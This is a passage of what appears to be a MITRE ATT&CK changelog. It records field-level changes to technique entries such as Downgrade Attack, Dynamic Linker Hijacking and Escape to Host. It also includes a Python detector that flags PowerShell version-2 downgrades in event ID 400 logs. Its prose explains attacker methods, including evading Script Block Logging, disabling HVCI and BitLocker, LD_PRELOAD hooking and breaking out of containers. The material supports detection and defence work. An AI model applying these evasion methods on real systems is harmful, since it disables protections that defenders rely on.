Description diff (old → new): two changes. First, a comma is added in "versions 5+ includes Script Block Logging (SBL) which can record executed script content", which now reads "versions 5+ includes Script Block Logging (SBL), which can record executed script content". Second, the new version appends one sentence after "...exposes network data in clear text.(Citation: Targeted SSL Stripping Attacks Are Real)(Citation: Crowdstrike Downgrade)":
Added: On Windows systems, adversaries may downgrade the boot manager to a vulnerable version that bypasses Secure Boot, granting the ability to disable various operating system security mechanisms.(Citation: SafeBreach)
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-03 16:40:15.445000+00:00 | 2025-04-15 19:58:46.929000+00:00 |
description | Adversaries may downgrade or use a version of system features that may be outdated, vulnerable, and/or does not support updated security controls. Downgrade attacks typically take advantage of a system’s backward compatibility to force it into less secure modes of operation.
Adversaries may downgrade and use various less-secure versions of features of a system, such as [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s or even network protocols that can be abused to enable [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) or [Network Sniffing](https://attack.mitre.org/techniques/T1040).(Citation: Praetorian TLS Downgrade Attack 2014) For example, [PowerShell](https://attack.mitre.org/techniques/T1059/001) versions 5+ includes Script Block Logging (SBL) which can record executed script content. However, adversaries may attempt to execute a previous version of PowerShell that does not support SBL with the intent to [Impair Defenses](https://attack.mitre.org/techniques/T1562) while running malicious scripts that may have otherwise been detected.(Citation: CrowdStrike BGH Ransomware 2021)(Citation: Mandiant BYOL 2018)(Citation: att_def_ps_logging)
Adversaries may similarly target network traffic to downgrade from an encrypted HTTPS connection to an unsecured HTTP connection that exposes network data in clear text.(Citation: Targeted SSL Stripping Attacks Are Real)(Citation: Crowdstrike Downgrade) | Adversaries may downgrade or use a version of system features that may be outdated, vulnerable, and/or does not support updated security controls. Downgrade attacks typically take advantage of a system’s backward compatibility to force it into less secure modes of operation.
Adversaries may downgrade and use various less-secure versions of features of a system, such as [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s or even network protocols that can be abused to enable [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) or [Network Sniffing](https://attack.mitre.org/techniques/T1040).(Citation: Praetorian TLS Downgrade Attack 2014) For example, [PowerShell](https://attack.mitre.org/techniques/T1059/001) versions 5+ includes Script Block Logging (SBL), which can record executed script content. However, adversaries may attempt to execute a previous version of PowerShell that does not support SBL with the intent to [Impair Defenses](https://attack.mitre.org/techniques/T1562) while running malicious scripts that may have otherwise been detected.(Citation: CrowdStrike BGH Ransomware 2021)(Citation: Mandiant BYOL 2018)(Citation: att_def_ps_logging)
Adversaries may similarly target network traffic to downgrade from an encrypted HTTPS connection to an unsecured HTTP connection that exposes network data in clear text.(Citation: Targeted SSL Stripping Attacks Are Real)(Citation: Crowdstrike Downgrade) On Windows systems, adversaries may downgrade the boot manager to a vulnerable version that bypasses Secure Boot, granting the ability to disable various operating system security mechanisms.(Citation: SafeBreach) |
x_mitre_detection | Monitor for commands or other activity that may be indicative of attempts to abuse older or deprecated technologies (ex: powershell –v 2 ). Also monitor for other abnormal events, such as execution of and/or processes spawning from a version of a tool that is not expected in the environment.
Monitor for Windows event ID (EID) 400, specifically the EngineVersion field which shows the version of PowerShell running and may highlight a malicious downgrade attack.(Citation: inv_ps_attacks)
Monitor network data to detect cases where HTTP is used instead of HTTPS. | Monitor for commands or other activity that may be indicative of attempts to abuse older or deprecated technologies (ex: powershell –v 2 ). Also monitor for other abnormal events, such as execution of and/or processes spawning from a version of a tool that is not expected in the environment.
Monitor for Windows event ID (EID) 400, specifically the EngineVersion field which shows the version of PowerShell running and may highlight a malicious downgrade attack.(Citation: inv_ps_attacks)
Monitor network data to detect cases where HTTP is used instead of HTTPS.
Monitor executed commands and arguments that may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. Bitlocker can be disabled by calling DisableKeyProtectors and setting DisableCount to 0.(Citation: welivesecurity)
Monitor for newly constructed files that may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Adversaries can construct new files in the EFI System Partition.(Citation: Microsoft Security)(Citation: welivesecurity)
Monitor for changes made to Windows Registry keys and/or values related to services and startup programs that correspond to security tools such as HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender. HVCI (Hypervisor-Protected Code Integrity) can be disabled by modifying the registry key to 0, allowing the system to run custom unsigned kernel code.(Citation: Microsoft Security)(Citation: welivesecurity) |
x_mitre_version | 1.2 | 1.3 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
external_references | | {'source_name': 'SafeBreach', 'description': 'Alon Leviev. (2024, August 7). Windows Downdate: Downgrade Attacks Using Windows Updates. Retrieved January 8, 2025.', 'url': 'https://www.safebreach.com/blog/downgrade-attacks-using-windows-updates/'} |
external_references | | {'source_name': 'welivesecurity', 'description': 'Martin Smolár. (2023, March 1). BlackLotus UEFI bootkit: Myth confirmed. Retrieved February 11, 2025.', 'url': 'https://www.welivesecurity.com/2023/03/01/blacklotus-uefi-bootkit-myth-confirmed/'} |
external_references | | {'source_name': 'Microsoft Security', 'description': 'Microsoft Incident Response. (2023, April 11). Guidance for investigating attacks using CVE-2022-21894: The BlackLotus campaign. Retrieved February 12, 2025.', 'url': 'https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/'} |
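As an added example (not part of the ATT&CK changelog and not MITRE's own tooling), the EID 400 check named in the detection text above, in Python: it parses the Details block of PowerShell event ID 400 messages, flags engines older than 5.0, and notes when a current host started an old engine, which is the `powershell -v 2` pattern. The sample messages are constructed; the field names follow the event's Details block, and the 5.0 threshold is the assumption that Script Block Logging needs PowerShell 5+.

```python
import re
from typing import Optional

# Constructed sample messages modelled on the "Details" block of Windows
# PowerShell event ID 400 (Engine state is changed from None to Available).
# Real events carry more fields; only those used here are included.
SAMPLE_EID400 = [
    "Engine state is changed from None to Available.\n\nDetails:\n"
    "\tNewEngineState=Available\n\tPreviousEngineState=None\n"
    "\tHostName=ConsoleHost\n\tHostVersion=5.1.19041.1\n"
    "\tHostApplication=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\n"
    "\tEngineVersion=5.1.19041.1\n",
    "Engine state is changed from None to Available.\n\nDetails:\n"
    "\tNewEngineState=Available\n\tPreviousEngineState=None\n"
    "\tHostName=ConsoleHost\n\tHostVersion=5.1.19041.1\n"
    "\tHostApplication=powershell -v 2 -File C:\\Temp\\task.ps1\n"
    "\tEngineVersion=2.0\n",
]

# Script Block Logging arrived with PowerShell 5; an older engine is a downgrade.
MINIMUM_ENGINE = (5, 0)

# One tab-indented KEY=VALUE line of the Details block.
FIELD_RE = re.compile(r"^\s*(\w+)=(.*)$", re.MULTILINE)


def parse_details(message: str) -> dict:
    """Turn the KEY=VALUE lines of an EID 400 message into a dict."""
    return {key: value.strip() for key, value in FIELD_RE.findall(message)}


def version_tuple(text: str) -> tuple:
    """'5.1.19041.1' -> (5, 1, 19041, 1); non-numeric parts are dropped."""
    return tuple(int(part) for part in text.split(".") if part.isdigit())


def classify_event(message: str) -> Optional[dict]:
    """Return a finding when the engine that started is below MINIMUM_ENGINE."""
    details = parse_details(message)
    engine = version_tuple(details.get("EngineVersion", ""))
    if not engine or engine >= MINIMUM_ENGINE:
        return None
    host = version_tuple(details.get("HostVersion", ""))
    host_app = details.get("HostApplication", "")
    return {
        "engine_version": details["EngineVersion"],
        "host_application": host_app,
        # A current host starting an old engine is the "powershell -v 2"
        # pattern called out in the ATT&CK detection guidance.
        "modern_host_old_engine": bool(host) and host >= MINIMUM_ENGINE,
        # An explicit -v/-Version switch on the command line corroborates it.
        "explicit_version_switch": bool(
            re.search(r"(?i)\s-v(?:ersion)?\s+\d", host_app)
        ),
    }


def find_engine_downgrades(messages) -> list:
    """Run classify_event over a batch of EID 400 messages, keeping the hits."""
    return [finding for finding in map(classify_event, messages) if finding]


if __name__ == "__main__":
    for finding in find_engine_downgrades(SAMPLE_EID400):
        print(finding)
```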
[T1601.002] Modify System Image: Downgrade System Image
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['Administrator'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-10-22 17:49:02.660000+00:00 | 2025-04-15 19:59:24.391000+00:00 |
x_mitre_version | 1.0 | 1.1 |
x_mitre_platforms[0] | Network | Network Devices |
[T1189] Drive-by Compromise
Current version: 1.7
Version changed from: 1.6 → 1.7
New Mitigations:
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-15 15:55:47.494000+00:00 | 2025-04-15 19:59:12.900000+00:00 |
description | Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring [Application Access Token](https://attack.mitre.org/techniques/T1550/001).
Multiple ways of delivering exploit code to a browser exist (i.e., [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)), including:
* A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting
* Script files served to a legitimate website from a publicly writeable cloud storage bucket are modified by an adversary
* Malicious ads are paid for and served through legitimate ad providers (i.e., [Malvertising](https://attack.mitre.org/techniques/T1583/008))
* Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content).
Often the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is often referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring.(Citation: Shadowserver Strategic Web Compromise)
Typical drive-by compromise process:
1. A user visits a website that is used to host the adversary controlled content.
2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version.
* The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes.
3. Upon finding a vulnerable version, exploit code is delivered to the browser.
4. If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place.
* In some cases a second visit to the website after the initial scan is required before exploit code is delivered.
Unlike [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ.
Adversaries may also use compromised websites to deliver a user to a malicious application designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, to gain access to protected applications and information. These malicious applications have been delivered through popups on legitimate websites.(Citation: Volexity OceanLotus Nov 2017) | Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. Multiple ways of delivering exploit code to a browser exist (i.e., [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)), including:
* A legitimate website is compromised, allowing adversaries to inject malicious code
* Script files served to a legitimate website from a publicly writeable cloud storage bucket are modified by an adversary
* Malicious ads are paid for and served through legitimate ad providers (i.e., [Malvertising](https://attack.mitre.org/techniques/T1583/008))
* Built-in web application interfaces that allow user-controllable content are leveraged for the insertion of malicious scripts or iFrames (e.g., cross-site scripting)
Browser push notifications may also be abused by adversaries and leveraged for malicious code injection via [User Execution](https://attack.mitre.org/techniques/T1204). By clicking "allow" on browser push notifications, users may be granting a website permission to run JavaScript code on their browser.(Citation: Push notifications - viruspositive)(Citation: push notification -mcafee)(Citation: push notifications - malwarebytes)
Often the website used by an adversary is one visited by a specific community, such as government, a particular industry, or a particular region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is often referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring.(Citation: Shadowserver Strategic Web Compromise)
Typical drive-by compromise process:
1. A user visits a website that is used to host the adversary controlled content.
2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version. The user may be required to assist in this process by enabling scripting, notifications, or active website components and ignoring warning dialog boxes.
3. Upon finding a vulnerable version, exploit code is delivered to the browser.
4. If exploitation is successful, the adversary will gain code execution on the user's system unless other protections are in place. In some cases, a second visit to the website after the initial scan is required before exploit code is delivered.
Unlike [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ. |
external_references[2]['source_name'] | Volexity OceanLotus Nov 2017 | push notifications - malwarebytes |
external_references[2]['description'] | Lassalle, D., et al. (2017, November 6). OceanLotus Blossoms: Mass Digital Surveillance and Attacks Targeting ASEAN, Asian Nations, the Media, Human Rights Groups, and Civil Society. Retrieved November 6, 2017. | Pieter Arntz. (2019, January 22). Browser push notifications: a feature asking to be abused. Retrieved March 14, 2025. |
external_references[2]['url'] | https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/ | https://www.malwarebytes.com/blog/news/2019/01/browser-push-notifications-feature-asking-abused |
x_mitre_version | 1.6 | 1.7 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
external_references | | {'source_name': 'push notification -mcafee', 'description': 'Craig Schmugar. (2021, May 17). Scammers Impersonating Windows Defender to Push Malicious Windows Apps. Retrieved March 14, 2025.', 'url': 'https://www.mcafee.com/blogs/other-blogs/mcafee-labs/scammers-impersonating-windows-defender-to-push-malicious-windows-apps/'} |
external_references | | {'source_name': 'Push notifications - viruspositive', 'description': 'Gaurav Sethi. (2021, December 14). The Dark Side of Web Push Notifications. Retrieved March 14, 2025.', 'url': 'https://viruspositive.com/resources/blogs/the-dark-side-of-web-push-notifications'} |
x_mitre_contributors | | Frank Angiolelli |
[T1574.004] Hijack Execution Flow: Dylib Hijacking
Current version: 2.1
Version changed from: 2.0 → 2.1
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Application Control'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-30 21:01:39.601000+00:00 | 2025-04-15 19:59:24.300000+00:00 |
external_references[6]['description'] | Patrick Wardle. (2020, August 5). The Art of Mac Malware Volume 0x1: Analysis. Retrieved March 19, 2021. | Patrick Wardle. (2020, August 5). The Art of Mac Malware Volume 0x1: Analysis. Retrieved November 17, 2024. |
external_references[6]['url'] | https://taomm.org/vol1/pdfs.html | https://taomm.org/vol1/read.html |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 2.0 | 2.1 |
[T1559.002] Inter-Process Communication: Dynamic Data Exchange
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_remote_support | True | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-15 18:57:21.881000+00:00 | 2025-04-16 20:37:15.927000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.3 | 1.4 |
[T1574.006] Hijack Execution Flow: Dynamic Linker Hijacking
Current version: 2.1
Version changed from: 2.0 → 2.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_deprecated | | False |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['User'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-30 21:01:40.146000+00:00 | 2025-04-15 19:58:36.147000+00:00 |
description | Adversaries may execute their own malicious payloads by hijacking environment variables the dynamic linker uses to load shared libraries. During the execution preparation phase of a program, the dynamic linker loads specified absolute paths of shared libraries from environment variables and files, such as LD_PRELOAD on Linux or DYLD_INSERT_LIBRARIES on macOS. Libraries specified in environment variables are loaded first, taking precedence over system libraries with the same function name.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries)(Citation: Apple Doco Archive Dynamic Libraries) These variables are often used by developers to debug binaries without needing to recompile, deconflict mapped symbols, and implement custom functions without changing the original library.(Citation: Baeldung LD_PRELOAD)
On Linux and macOS, hijacking dynamic linker variables may grant access to the victim process's memory, system/network resources, and possibly elevated privileges. This method may also evade detection from security products since the execution is masked under a legitimate process. Adversaries can set environment variables via the command line using the export command, setenv function, or putenv function. Adversaries can also leverage [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006) to export variables in a shell or set variables programmatically using higher level syntax such Python’s os.environ .
On Linux, adversaries may set LD_PRELOAD to point to malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program. LD_PRELOAD can be set via the environment variable or /etc/ld.so.preload file.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries) Libraries specified by LD_PRELOAD are loaded and mapped into memory by dlopen() and mmap() respectively.(Citation: Code Injection on Linux and macOS)(Citation: Uninformed Needle) (Citation: Phrack halfdead 1997)(Citation: Brown Exploiting Linkers)
On macOS this behavior is conceptually the same as on Linux, differing only in how the macOS dynamic libraries (dyld) is implemented at a lower level. Adversaries can set the DYLD_INSERT_LIBRARIES environment variable to point to malicious libraries containing names of legitimate libraries or functions requested by a victim program.(Citation: TheEvilBit DYLD_INSERT_LIBRARIES)(Citation: Timac DYLD_INSERT_LIBRARIES)(Citation: Gabilondo DYLD_INSERT_LIBRARIES Catalina Bypass) | Adversaries may execute their own malicious payloads by hijacking environment variables the dynamic linker uses to load shared libraries. During the execution preparation phase of a program, the dynamic linker loads specified absolute paths of shared libraries from various environment variables and files, such as LD_PRELOAD on Linux or DYLD_INSERT_LIBRARIES on macOS.(Citation: TheEvilBit DYLD_INSERT_LIBRARIES)(Citation: Timac DYLD_INSERT_LIBRARIES)(Citation: Gabilondo DYLD_INSERT_LIBRARIES Catalina Bypass) Libraries specified in environment variables are loaded first, taking precedence over system libraries with the same function name.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries)(Citation: Apple Doco Archive Dynamic Libraries) Each platform's linker uses an extensive list of environment variables at different points in execution. These variables are often used by developers to debug binaries without needing to recompile, deconflict mapped symbols, and implement custom functions in the original library.(Citation: Baeldung LD_PRELOAD)
Hijacking dynamic linker variables may grant access to the victim process's memory, system/network resources, and possibly elevated privileges. On Linux, adversaries may set LD_PRELOAD to point to malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program. For example, adversaries have used `LD_PRELOAD` to inject a malicious library into every descendant process of the `sshd` daemon, resulting in execution under a legitimate process. When the executing sub-process calls the `execve` function, for example, the malicious library’s `execve` function is executed rather than the system function `execve` contained in the system library on disk. This allows adversaries to [Hide Artifacts](https://attack.mitre.org/techniques/T1564) from detection, as hooking system functions such as `execve` and `readdir` enables malware to scrub its own artifacts from the results of commands such as `ls`, `ldd`, `iptables`, and `dmesg`.(Citation: ESET Ebury Oct 2017)(Citation: Intezer Symbiote 2022)(Citation: Elastic Security Labs Pumakit 2024)
Hijacking dynamic linker variables may grant access to the victim process's memory, system/network resources, and possibly elevated privileges. |
external_references[5]['source_name'] | Code Injection on Linux and macOS | ESET Ebury Oct 2017 |
external_references[5]['description'] | Itamar Turner-Trauring. (2017, April 18). “This will only hurt for a moment”: code injection on Linux and macOS with LD_PRELOAD. Retrieved December 20, 2017. | Vachon, F. (2017, October 30). Windigo Still not Windigone: An Ebury Update . Retrieved February 10, 2021. |
external_references[5]['url'] | https://www.datawire.io/code-injection-on-linux-and-macos/ | https://www.welivesecurity.com/2017/10/30/windigo-ebury-update-2/ |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 2.0 | 2.1 |
external_references[7] | {'source_name': 'Phrack halfdead 1997', 'description': 'halflife. (1997, September 1). Shared Library Redirection Techniques. Retrieved December 20, 2017.', 'url': 'http://phrack.org/issues/51/8.html'} | {'source_name': 'Elastic Security Labs Pumakit 2024', 'description': 'Remco Sprooten and Ruben Groenewoud. (2024, December 11). Declawing PUMAKIT. Retrieved March 24, 2025.', 'url': 'https://www.elastic.co/security-labs/declawing-pumakit'} |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
external_references | | {'source_name': 'Intezer Symbiote 2022', 'description': 'Joakim Kennedy and The BlackBerry Threat Research & Intelligence Team. (2022, June 9). Symbiote Deep-Dive: Analysis of a New, Nearly-Impossible-to-Detect Linux Threat. Retrieved March 24, 2025.', 'url': 'https://intezer.com/blog/research/new-linux-threat-symbiote/'} |
iterable_item_removed
STIX Field | Old value | New Value |
---|---|---|
external_references | {'source_name': 'Uninformed Needle', 'description': 'skape. (2003, January 19). Linux x86 run-time process manipulation. Retrieved December 20, 2017.', 'url': 'http://hick.org/code/skape/papers/needle.txt'} | |
external_references | {'source_name': 'Brown Exploiting Linkers', 'description': 'Tim Brown. (2011, June 29). Breaking the links: Exploiting the linker. Retrieved March 29, 2021.', 'url': 'http://www.nth-dimension.org.uk/pub/BTL.pdf'} | |
[T1568] Dynamic Resolution
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['User'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-03-11 18:26:23.782000+00:00 | 2025-04-15 19:58:44.211000+00:00 |
x_mitre_version | 1.0 | 1.1 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1055.001] Process Injection: Dynamic-link Library Injection
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Application control', 'Anti-virus'] | |
x_mitre_permissions_required | ['User'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-08-11 21:34:38.558000+00:00 | 2025-04-16 20:37:22.834000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.3 | 1.4 |
[T1548.004] Abuse Elevation Control Mechanism: Elevated Execution with Prompt
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_effective_permissions | ['root'] | |
x_mitre_permissions_required | ['Administrator', 'User'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-19 16:35:18.492000+00:00 | 2025-04-16 20:37:19.503000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 1.0 | 1.1 |
[T1027.009] Obfuscated Files or Information: Embedded Payloads
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_system_requirements | ['User'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-29 21:14:57.263000+00:00 | 2025-04-15 19:58:03.051000+00:00 |
x_mitre_version | 1.1 | 1.2 |
[T1546.014] Event Triggered Execution: Emond
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['Administrator'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-04-20 00:16:01.732000+00:00 | 2025-04-16 20:37:18.374000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 1.0 | 1.1 |
[T1573] Encrypted Channel
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-16 12:29:47.903000+00:00 | 2025-04-15 19:59:01.172000+00:00 |
x_mitre_version | 1.1 | 1.2 |
x_mitre_platforms[3] | Network | Network Devices |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1027.013] Obfuscated Files or Information: Encrypted/Encoded File
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-15 16:32:45.108000+00:00 | 2025-04-15 19:58:05.840000+00:00 |
description | Adversaries may encrypt or encode files to obfuscate strings, bytes, and other specific patterns to impede detection. Encrypting and/or encoding file content aims to conceal malicious artifacts within a file used in an intrusion. Many other techniques, such as [Software Packing](https://attack.mitre.org/techniques/T1027/002), [Steganography](https://attack.mitre.org/techniques/T1027/003), and [Embedded Payloads](https://attack.mitre.org/techniques/T1027/009), share this same broad objective. Encrypting and/or encoding files could lead to a lapse in detection of static signatures, only for this malicious content to be revealed (i.e., [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)) at the time of execution/use.
This type of file obfuscation can be applied to many file artifacts present on victim hosts, such as malware log/configuration and payload files.(Citation: File obfuscation) Files can be encrypted with a hardcoded or user-supplied key, as well as otherwise obfuscated using standard encoding/compression schemes such as Base64.
The entire content of a file may be obfuscated, or just specific functions or values (such as C2 addresses). Encryption and encoding may also be applied in redundant layers for additional protection.
For example, adversaries may abuse password-protected Word documents or self-extracting (SFX) archives as a method of encrypting/encoding a file such as a [Phishing](https://attack.mitre.org/techniques/T1566) payload. These files typically function by attaching the intended archived content to a decompressor stub that is executed when the file is invoked (e.g., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: SFX - Encrypted/Encoded File)
Adversaries may also abuse file-specific as well as custom encoding schemes. For example, Byte Order Mark (BOM) headers in text files may be abused to manipulate and obfuscate file content until [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) execution. | Adversaries may encrypt or encode files to obfuscate strings, bytes, and other specific patterns to impede detection. Encrypting and/or encoding file content aims to conceal malicious artifacts within a file used in an intrusion. Many other techniques, such as [Software Packing](https://attack.mitre.org/techniques/T1027/002), [Steganography](https://attack.mitre.org/techniques/T1027/003), and [Embedded Payloads](https://attack.mitre.org/techniques/T1027/009), share this same broad objective. Encrypting and/or encoding files could lead to a lapse in detection of static signatures, only for this malicious content to be revealed (i.e., [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)) at the time of execution/use.
This type of file obfuscation can be applied to many file artifacts present on victim hosts, such as malware log/configuration and payload files.(Citation: File obfuscation) Files can be encrypted with a hardcoded or user-supplied key, as well as otherwise obfuscated using standard encoding schemes such as Base64.
The entire content of a file may be obfuscated, or just specific functions or values (such as C2 addresses). Encryption and encoding may also be applied in redundant layers for additional protection.
For example, adversaries may abuse password-protected Word documents or self-extracting (SFX) archives as a method of encrypting/encoding a file such as a [Phishing](https://attack.mitre.org/techniques/T1566) payload. These files typically function by attaching the intended archived content to a decompressor stub that is executed when the file is invoked (e.g., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: SFX - Encrypted/Encoded File)
Adversaries may also abuse file-specific as well as custom encoding schemes. For example, Byte Order Mark (BOM) headers in text files may be abused to manipulate and obfuscate file content until [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) execution. |
x_mitre_version | 1.0 | 1.1 |
[T1480.001] Execution Guardrails: Environmental Keying
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Anti-virus', 'Host Forensic Analysis', 'Signature-based Detection', 'Static File Analysis'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-05-04 14:52:51.290000+00:00 | 2025-04-15 19:59:20.646000+00:00 |
external_references[7]['description'] | Warren, R. (2017, August 8). Smuggling HTA files in Internet Explorer/Edge. Retrieved January 16, 2019. | Warren, R. (2017, August 8). Smuggling HTA files in Internet Explorer/Edge. Retrieved November 17, 2024. |
external_references[7]['url'] | https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/smuggling-hta-files-in-internet-exploreredge/ | http://web.archive.org/web/20200608093807/https://www.nccgroup.com/uk/about-us/newsroom-and-events/blogs/2017/august/smuggling-hta-files-in-internet-exploreredge/ |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 1.0 | 1.1 |
[T1611] Escape to Host
Current version: 1.6
Version changed from: 1.5 → 1.6
New Mitigations:
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['Administrator', 'User', 'root'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-19 12:42:18.632000+00:00 | 2025-04-15 19:58:28.417000+00:00 |
description | Adversaries may break out of a container to gain access to the underlying host. This can allow an adversary access to other containerized resources from the host level or to the host itself. In principle, containerized resources should provide a clear separation of application functionality and be isolated from the host environment.(Citation: Docker Overview)
There are multiple ways an adversary may escape to a host environment. Examples include creating a container configured to mount the host’s filesystem using the bind parameter, which allows the adversary to drop payloads and execute control utilities such as cron on the host; utilizing a privileged container to run commands or load a malicious kernel module on the underlying host; or abusing system calls such as `unshare` and `keyctl` to escalate privileges and steal secrets.(Citation: Docker Bind Mounts)(Citation: Trend Micro Privileged Container)(Citation: Intezer Doki July 20)(Citation: Container Escape)(Citation: Crowdstrike Kubernetes Container Escape)(Citation: Keyctl-unmask)
Additionally, an adversary may be able to exploit a compromised container with a mounted container management socket, such as `docker.sock`, to break out of the container via a [Container Administration Command](https://attack.mitre.org/techniques/T1609).(Citation: Container Escape) Adversaries may also escape via [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), such as exploiting vulnerabilities in global symbolic links in order to access the root directory of a host machine.(Citation: Windows Server Containers Are Open)
Gaining access to the host may provide the adversary with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally within the environment, accessing other containers running on the host, or setting up a command and control channel on the host. | Adversaries may break out of a container or virtualized environment to gain access to the underlying host. This can allow an adversary access to other containerized or virtualized resources from the host level or to the host itself. In principle, containerized / virtualized resources should provide a clear separation of application functionality and be isolated from the host environment.(Citation: Docker Overview)
